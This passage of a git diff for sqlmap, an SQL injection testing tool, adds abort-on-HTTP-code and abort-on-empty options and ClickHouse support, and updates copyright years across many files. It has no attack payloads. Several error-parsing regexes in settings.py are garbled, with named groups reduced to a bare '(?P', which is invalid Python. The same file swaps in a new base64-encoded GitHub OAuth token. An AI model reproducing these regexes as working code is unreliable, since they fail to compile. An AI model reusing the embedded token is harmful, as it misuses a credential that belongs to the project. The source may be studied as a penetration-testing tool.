- errMsg = "options '--ignore-code' should contain a list of integer values or a wildcard value '%s'" % IGNORE_CODE_WILDCARD
+ errMsg = "option '--ignore-code' should contain a list of integer values or a wildcard value '%s'" % IGNORE_CODE_WILDCARD
raise SqlmapSyntaxException(errMsg)
else:
conf.ignoreCode = []
+ if conf.abortCode:
+ try:
+ conf.abortCode = [int(_) for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.abortCode)]
+ except ValueError:
+ errMsg = "option '--abort-code' should contain a list of integer values"
+ raise SqlmapSyntaxException(errMsg)
+ else:
+ conf.abortCode = []
+
if conf.paramFilter:
conf.paramFilter = [_.strip() for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.paramFilter.upper())]
else:
@@ -2136,6 +2145,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.prependFlag = False
kb.processResponseCounter = 0
kb.previousMethod = None
+ kb.processNonCustom = None
kb.processUserMarks = None
kb.proxyAuthHeader = None
kb.queryCounter = 0
@@ -2655,6 +2665,9 @@ def _basicOptionValidation():
raise SqlmapSyntaxException(errMsg)
if conf.paramExclude:
+ if re.search(r"\A\w+,", conf.paramExclude):
+ conf.paramExclude = r"\A(%s)\Z" % ('|'.join(re.escape(_).strip() for _ in conf.paramExclude.split(',')))
+
try:
re.compile(conf.paramExclude)
except Exception as ex:
diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py
index 573361b92..761ee9955 100644
--- a/lib/core/optiondict.py
+++ b/lib/core/optiondict.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -39,6 +39,7 @@ optDict = {
"authType": "string",
"authCred": "string",
"authFile": "string",
+ "abortCode": "string",
"ignoreCode": "string",
"ignoreProxy": "boolean",
"ignoreRedirects": "boolean",
@@ -204,6 +205,7 @@ optDict = {
"General": {
"trafficFile": "string",
+ "abortOnEmpty": "boolean",
"answers": "string",
"batch": "boolean",
"base64Parameter": "string",
diff --git a/lib/core/patch.py b/lib/core/patch.py
index ca333bc96..186814325 100644
--- a/lib/core/patch.py
+++ b/lib/core/patch.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/profiling.py b/lib/core/profiling.py
index 9b39e1dd0..4fddab24a 100644
--- a/lib/core/profiling.py
+++ b/lib/core/profiling.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/readlineng.py b/lib/core/readlineng.py
index a3cea35dc..0a6c1dd51 100644
--- a/lib/core/readlineng.py
+++ b/lib/core/readlineng.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/replication.py b/lib/core/replication.py
index b21b1d19b..236d1ed44 100644
--- a/lib/core/replication.py
+++ b/lib/core/replication.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/revision.py b/lib/core/revision.py
index 14e6b1b7f..7abd30cd0 100644
--- a/lib/core/revision.py
+++ b/lib/core/revision.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/session.py b/lib/core/session.py
index 9357a5bb5..c50d7b03e 100644
--- a/lib/core/session.py
+++ b/lib/core/session.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/settings.py b/lib/core/settings.py
index ad6ed8453..e065056ab 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -20,7 +20,7 @@ from thirdparty import six
from thirdparty.six import unichr as _unichr
# sqlmap version (...)
-VERSION = "1.6.12.11"
+VERSION = "1.7.3.3"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@@ -283,6 +283,7 @@ PRESTO_SYSTEM_DBS = ("information_schema",)
ALTIBASE_SYSTEM_DBS = ("SYSTEM_",)
MIMERSQL_SYSTEM_DBS = ("information_schema", "SYSTEM",)
CRATEDB_SYSTEM_DBS = ("information_schema", "pg_catalog", "sys")
+CLICKHOUSE_SYSTEM_DBS = ("information_schema", "INFORMATION_SCHEMA", "system")
CUBRID_SYSTEM_DBS = ("DBA",)
CACHE_SYSTEM_DBS = ("%Dictionary", "INFORMATION_SCHEMA", "%SYS")
EXTREMEDB_SYSTEM_DBS = ("",)
@@ -313,6 +314,7 @@ ALTIBASE_ALIASES = ("altibase",)
MIMERSQL_ALIASES = ("mimersql", "mimer")
CRATEDB_ALIASES = ("cratedb", "crate")
CUBRID_ALIASES = ("cubrid",)
+CLICKHOUSE_ALIASES = ("clickhouse",)
CACHE_ALIASES = ("intersystems cache", "cachedb", "cache", "iris")
EXTREMEDB_ALIASES = ("extremedb", "extreme")
FRONTBASE_ALIASES = ("frontbase",)
@@ -321,10 +323,10 @@ VIRTUOSO_ALIASES = ("virtuoso", "openlink virtuoso")
DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_"))
-SUPPORTED_DBMS = set(MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES + MONETDB_ALIASES + DERBY_ALIASES + VERTICA_ALIASES + MCKOI_ALIASES + PRESTO_ALIASES + ALTIBASE_ALIASES + MIMERSQL_ALIASES + CRATEDB_ALIASES + CUBRID_ALIASES + CACHE_ALIASES + EXTREMEDB_ALIASES + RAIMA_ALIASES + VIRTUOSO_ALIASES)
+SUPPORTED_DBMS = set(MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES + MONETDB_ALIASES + DERBY_ALIASES + VERTICA_ALIASES + MCKOI_ALIASES + PRESTO_ALIASES + ALTIBASE_ALIASES + MIMERSQL_ALIASES + CLICKHOUSE_ALIASES + CRATEDB_ALIASES + CUBRID_ALIASES + CACHE_ALIASES + EXTREMEDB_ALIASES + RAIMA_ALIASES + VIRTUOSO_ALIASES)
SUPPORTED_OS = ("linux", "windows")
-DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES), (DBMS.MONETDB, MONETDB_ALIASES), (DBMS.DERBY, DERBY_ALIASES), (DBMS.VERTICA, VERTICA_ALIASES), (DBMS.MCKOI, MCKOI_ALIASES), (DBMS.PRESTO, PRESTO_ALIASES), (DBMS.ALTIBASE, ALTIBASE_ALIASES), (DBMS.MIMERSQL, MIMERSQL_ALIASES), (DBMS.CRATEDB, CRATEDB_ALIASES), (DBMS.CUBRID, CUBRID_ALIASES), (DBMS.CACHE, CACHE_ALIASES), (DBMS.EXTREMEDB, EXTREMEDB_ALIASES), (DBMS.FRONTBASE, FRONTBASE_ALIASES), (DBMS.RAIMA, RAIMA_ALIASES), (DBMS.VIRTUOSO, VIRTUOSO_ALIASES))
+DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES), (DBMS.MONETDB, MONETDB_ALIASES), (DBMS.DERBY, DERBY_ALIASES), (DBMS.VERTICA, VERTICA_ALIASES), (DBMS.MCKOI, MCKOI_ALIASES), (DBMS.PRESTO, PRESTO_ALIASES), (DBMS.ALTIBASE, ALTIBASE_ALIASES), (DBMS.MIMERSQL, MIMERSQL_ALIASES), (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES), (DBMS.CRATEDB, CRATEDB_ALIASES), (DBMS.CUBRID, CUBRID_ALIASES), (DBMS.CACHE, CACHE_ALIASES), (DBMS.EXTREMEDB, EXTREMEDB_ALIASES), (DBMS.FRONTBASE, FRONTBASE_ALIASES), (DBMS.RAIMA, RAIMA_ALIASES), (DBMS.VIRTUOSO, VIRTUOSO_ALIASES))
USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
REFERER_ALIASES = ("ref", "referer", "referrer")
@@ -413,6 +415,7 @@ ERROR_PARSING_REGEXES = (
r"(?P[^\n>]{0,100}SQL Syntax[^\n<]+)",
r"(?s)Error Type:
(?P.+?)",
r"CDbCommand (?P[^<>\n]*SQL[^<>\n]+)",
+ r"Code: \d+. DB::Exception: (?P[^<>\n]*)",
r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P[^<>]+)",
r"\[[^\n\]]{1,100}(ODBC|JDBC)[^\n\]]+\](\[[^\]]+\])?(?P[^\n]+(in query expression|\(SQL| at /[^ ]+pdo)[^\n<]+)",
r"(?Pquery error: SELECT[^<>]+)"
@@ -699,7 +702,7 @@ DEFAULT_COOKIE_DELIMITER = ';'
FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
# Github OAuth token used for creating an automatic Issue for unhandled exceptions
-GITHUB_REPORT_OAUTH_TOKEN = "Z2hwX2FOMDdpUWx0NDg0ak85QW4yU1pSQjhtazhBaVVlRzNaMUxmMA"
+GITHUB_REPORT_OAUTH_TOKEN = "Z2hwXzJEdUdKQXVyNms3c2J2em0weXNFYlVrZ2hxczE1eDBRQnA2Vg"
# Skip unforced HashDB flush requests below the threshold number of cached items
HASHDB_FLUSH_THRESHOLD = 32
diff --git a/lib/core/shell.py b/lib/core/shell.py
index e6ad40aa2..2ed47cecb 100644
--- a/lib/core/shell.py
+++ b/lib/core/shell.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/subprocessng.py b/lib/core/subprocessng.py
index beb29f70a..36fdf6563 100644
--- a/lib/core/subprocessng.py
+++ b/lib/core/subprocessng.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/target.py b/lib/core/target.py
index 0b3fe9592..7496d71b7 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/testing.py b/lib/core/testing.py
index 96b93ee53..55e2d6598 100644
--- a/lib/core/testing.py
+++ b/lib/core/testing.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/threads.py b/lib/core/threads.py
index cc0a5f572..8b5a21def 100644
--- a/lib/core/threads.py
+++ b/lib/core/threads.py
@@ -1,13 +1,14 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from __future__ import print_function
import difflib
+import sqlite3
import threading
import time
import traceback
@@ -227,16 +228,19 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
if conf.get("verbose") > 1 and isinstance(ex, SqlmapValueException):
traceback.print_exc()
- except:
+ except Exception as ex:
print()
if not kb.multipleCtrlC:
- from lib.core.common import unhandledExceptionMessage
+ if isinstance(ex, sqlite3.Error):
+ raise
+ else:
+ from lib.core.common import unhandledExceptionMessage
- kb.threadException = True
- errMsg = unhandledExceptionMessage()
- logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg))
- traceback.print_exc()
+ kb.threadException = True
+ errMsg = unhandledExceptionMessage()
+ logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg))
+ traceback.print_exc()
finally:
kb.multiThreadMode = False
diff --git a/lib/core/unescaper.py b/lib/core/unescaper.py
index c68e0342b..4d9045149 100644
--- a/lib/core/unescaper.py
+++ b/lib/core/unescaper.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/update.py b/lib/core/update.py
index d85a39f06..dee1639eb 100644
--- a/lib/core/update.py
+++ b/lib/core/update.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/wordlist.py b/lib/core/wordlist.py
index b634ed53f..781642bf5 100644
--- a/lib/core/wordlist.py
+++ b/lib/core/wordlist.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/parse/__init__.py b/lib/parse/__init__.py
index a5b83a8fa..8476fab2f 100644
--- a/lib/parse/__init__.py
+++ b/lib/parse/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/parse/banner.py b/lib/parse/banner.py
index 45694b41c..42b4dddc1 100644
--- a/lib/parse/banner.py
+++ b/lib/parse/banner.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 9b809baa6..e16e8223a 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -201,8 +201,11 @@ def cmdLineParser(argv=None):
request.add_argument("--auth-file", dest="authFile",
help="HTTP authentication PEM cert/private key file")
+ request.add_argument("--abort-code", dest="abortCode",
+ help="Abort on (problematic) HTTP error code(s) (e.g. 401)")
+
request.add_argument("--ignore-code", dest="ignoreCode",
- help="Ignore (problematic) HTTP error code (e.g. 401)")
+ help="Ignore (problematic) HTTP error code(s) (e.g. 401)")
request.add_argument("--ignore-proxy", dest="ignoreProxy", action="store_true",
help="Ignore system default proxy settings")
@@ -628,6 +631,9 @@ def cmdLineParser(argv=None):
general.add_argument("-t", dest="trafficFile",
help="Log all HTTP traffic into a textual file")
+ general.add_argument("--abort-on-empty", dest="abortOnEmpty", action="store_true",
+ help="Abort data retrieval on empty results")
+
general.add_argument("--answers", dest="answers",
help="Set predefined answers (e.g. \"quit=N,follow=N\")")
diff --git a/lib/parse/configfile.py b/lib/parse/configfile.py
index c5e47b10a..6891d11b4 100644
--- a/lib/parse/configfile.py
+++ b/lib/parse/configfile.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/parse/handler.py b/lib/parse/handler.py
index 6815194e3..9b951810c 100644
--- a/lib/parse/handler.py
+++ b/lib/parse/handler.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/parse/headers.py b/lib/parse/headers.py
index 0526b8365..52786244c 100644
--- a/lib/parse/headers.py
+++ b/lib/parse/headers.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/parse/html.py b/lib/parse/html.py
index b23fb7264..6e2aa6e36 100644
--- a/lib/parse/html.py
+++ b/lib/parse/html.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py
index 728beb97a..591abbfb7 100644
--- a/lib/parse/payloads.py
+++ b/lib/parse/payloads.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/parse/sitemap.py b/lib/parse/sitemap.py
index 452f894e8..db2f0901e 100644
--- a/lib/parse/sitemap.py
+++ b/lib/parse/sitemap.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/request/__init__.py b/lib/request/__init__.py
index a5b83a8fa..8476fab2f 100644
--- a/lib/request/__init__.py
+++ b/lib/request/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/request/basic.py b/lib/request/basic.py
index d865575e1..c00fd0df6 100644
--- a/lib/request/basic.py
+++ b/lib/request/basic.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/request/basicauthhandler.py b/lib/request/basicauthhandler.py
index 440e918df..f7c8408d8 100644
--- a/lib/request/basicauthhandler.py
+++ b/lib/request/basicauthhandler.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/request/chunkedhandler.py b/lib/request/chunkedhandler.py
index 51f80aee4..b27599329 100644
--- a/lib/request/chunkedhandler.py
+++ b/lib/request/chunkedhandler.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/request/comparison.py b/lib/request/comparison.py
index 261aacf14..c703b2bb9 100644
--- a/lib/request/comparison.py
+++ b/lib/request/comparison.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 5c0a207aa..e2387b07d 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -752,7 +752,7 @@ class Connect(object):
responseMsg += "[#%d] (%s %s):\r\n" % (threadData.lastRequestUID, code, status)
- if responseHeaders:
+ if responseHeaders and getattr(responseHeaders, "headers", None):
logHeaders = "".join(getUnicode(responseHeaders.headers)).strip()
logHTTPTraffic(requestMsg, "%s%s\r\n\r\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_READ_SIZE]), start, time.time())
@@ -767,6 +767,11 @@ class Connect(object):
if not multipart:
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
+ if code in conf.abortCode:
+ errMsg = "aborting due to detected HTTP code '%d'" % code
+ singleTimeLogMessage(errMsg, logging.CRITICAL)
+ raise SystemExit
+
if ex.code not in (conf.ignoreCode or []):
if ex.code == _http_client.UNAUTHORIZED:
errMsg = "not authorized, try to provide right HTTP "
@@ -921,6 +926,12 @@ class Connect(object):
errMsg += "function '%s' ('%s')" % (function.__name__, getSafeExString(ex))
raise SqlmapGenericException(errMsg)
+ for _ in (getattr(conn, "redcode", None), code):
+ if _ is not None and _ in conf.abortCode:
+ errMsg = "aborting due to detected HTTP code '%d'" % _
+ singleTimeLogMessage(errMsg, logging.CRITICAL)
+ raise SystemExit
+
threadData.lastPage = page
threadData.lastCode = code
@@ -1322,7 +1333,7 @@ class Connect(object):
compile(getBytes(re.sub(r"\s*;\s*", "\n", conf.evalCode)), "", "exec")
except SyntaxError as ex:
if ex.text:
- original = replacement = ex.text.strip()
+ original = replacement = getUnicode(ex.text.strip())
if '=' in original:
name, value = original.split('=', 1)
diff --git a/lib/request/direct.py b/lib/request/direct.py
index bbd7619d1..e56d2fb25 100644
--- a/lib/request/direct.py
+++ b/lib/request/direct.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/request/dns.py b/lib/request/dns.py
index da126eb6e..92dfdc187 100644
--- a/lib/request/dns.py
+++ b/lib/request/dns.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py
index d862d0885..c9676a9c4 100644
--- a/lib/request/httpshandler.py
+++ b/lib/request/httpshandler.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/request/inject.py b/lib/request/inject.py
index 7d584e8be..039ef1be3 100644
--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -501,10 +501,15 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
kb.safeCharEncode = False
if not any((kb.testMode, conf.dummy, conf.offline, conf.noCast, conf.hexConvert)) and value is None and Backend.getDbms() and conf.dbmsHandler and kb.fingerprinted:
- warnMsg = "in case of continuous data retrieval problems you are advised to try "
- warnMsg += "a switch '--no-cast' "
- warnMsg += "or switch '--hex'" if hasattr(queries[Backend.getIdentifiedDbms()], "hex") else ""
- singleTimeWarnMessage(warnMsg)
+ if conf.abortOnEmpty:
+ errMsg = "aborting due to empty data retrieval"
+ logger.critical(errMsg)
+ raise SystemExit
+ else:
+ warnMsg = "in case of continuous data retrieval problems you are advised to try "
+ warnMsg += "a switch '--no-cast' "
+ warnMsg += "or switch '--hex'" if hasattr(queries[Backend.getIdentifiedDbms()], "hex") else ""
+ singleTimeWarnMessage(warnMsg)
# Dirty patch (MSSQL --binary-fields with 0x31003200...)
if Backend.isDbms(DBMS.MSSQL) and conf.binaryFields:
diff --git a/lib/request/methodrequest.py b/lib/request/methodrequest.py
index 92dacdb5d..8535557b4 100644
--- a/lib/request/methodrequest.py
+++ b/lib/request/methodrequest.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/request/pkihandler.py b/lib/request/pkihandler.py
index dc7dca40a..05a6ccf16 100644
--- a/lib/request/pkihandler.py
+++ b/lib/request/pkihandler.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/request/rangehandler.py b/lib/request/rangehandler.py
index 458c32ec2..ff0598cf0 100644
--- a/lib/request/rangehandler.py
+++ b/lib/request/rangehandler.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/request/redirecthandler.py b/lib/request/redirecthandler.py
index 2e3c393f3..4920c561b 100644
--- a/lib/request/redirecthandler.py
+++ b/lib/request/redirecthandler.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/request/templates.py b/lib/request/templates.py
index d931e2058..bf673e277 100644
--- a/lib/request/templates.py
+++ b/lib/request/templates.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/takeover/__init__.py b/lib/takeover/__init__.py
index a5b83a8fa..8476fab2f 100644
--- a/lib/takeover/__init__.py
+++ b/lib/takeover/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py
index bb2faf01e..52f43ddde 100644
